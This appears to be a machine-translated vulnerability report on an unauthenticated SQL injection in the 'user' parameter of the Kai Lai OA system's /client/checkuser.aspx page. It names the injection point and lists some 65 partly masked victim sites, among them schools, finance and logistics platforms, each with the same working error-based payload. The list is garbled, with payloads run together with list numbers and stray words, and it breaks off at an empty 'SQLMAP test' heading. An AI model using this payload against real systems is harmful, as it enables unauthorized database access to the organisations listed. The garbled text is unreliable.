There is no need to log on to SQL injection in the Kai Lai OA system (with many cases)
No Logon required
Kai Lai technology OA system:
Http://www.qioa.cn/product/xsd.html
Customer case:
It affects many government and enterprise customers, but the case list is not intuitive:
Http://www.qioa.cn/index.php? M = content & c = index & a = lists & catid = 7
Injection point:
/Client/checkuser. aspx? User = 1 & pwd = 1 user parameter Injection
Case:
Mask Region
1. http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1 China 29 Finance-MIS system _ 2. http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1 Sichuan kingfa fire protection online office platform _ 3. http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1 _ zhongtong online office platform _ 4. http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1 Chongqing High-Tech Zone Yucai School Education OA Platform _ 5. http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1 Changsha mailong Gaoke online office platform _ 6. http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1 topic-Strategic Information Control Platform _ 7. http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1 Yunnan Logistics Industry Group _ 8. http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = pai9.http ://**. **. ** // client/checkuser. aspxuser = 1% 27 & pwd = 255.10.http ://**. **. ** // client/checkuser. aspxuser = % 27 & pwd = listen 11.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.12.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 13.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = define 14.http ://**. **. **/client/checkuser. aspxuser = 1% 27/**/aND-/**/1 = char (@ version)/**/% 20 -- % 20 & pwd = 255.15.http: //**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = listen 16.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.17.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.18.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 11219.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = commandid http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1_21.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1_22.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1_23.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.24.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.25.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 000026.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = route 27.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.28.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.29.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.30.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1_31.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1_32.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1_33.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 000034.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = listen 35.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 11236.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.37.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.38.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.39.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.40.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv41.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv42.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv43.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv44.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv45.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv46.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 47.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 000048.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 000049.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.50.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.51.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.52.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv53.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.54.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.55.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv56.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv57.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.58.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.59.http ://**. **. ** // client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 255.60.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv61.http ://**. **. **/clien t/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv62.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv63.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv64.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = ipv65.http ://**. **. **/client/checkuser. aspxuser = % 27and % 20 @ version % 3E0 -- & pwd = 1
Case test:
SQLMAP test: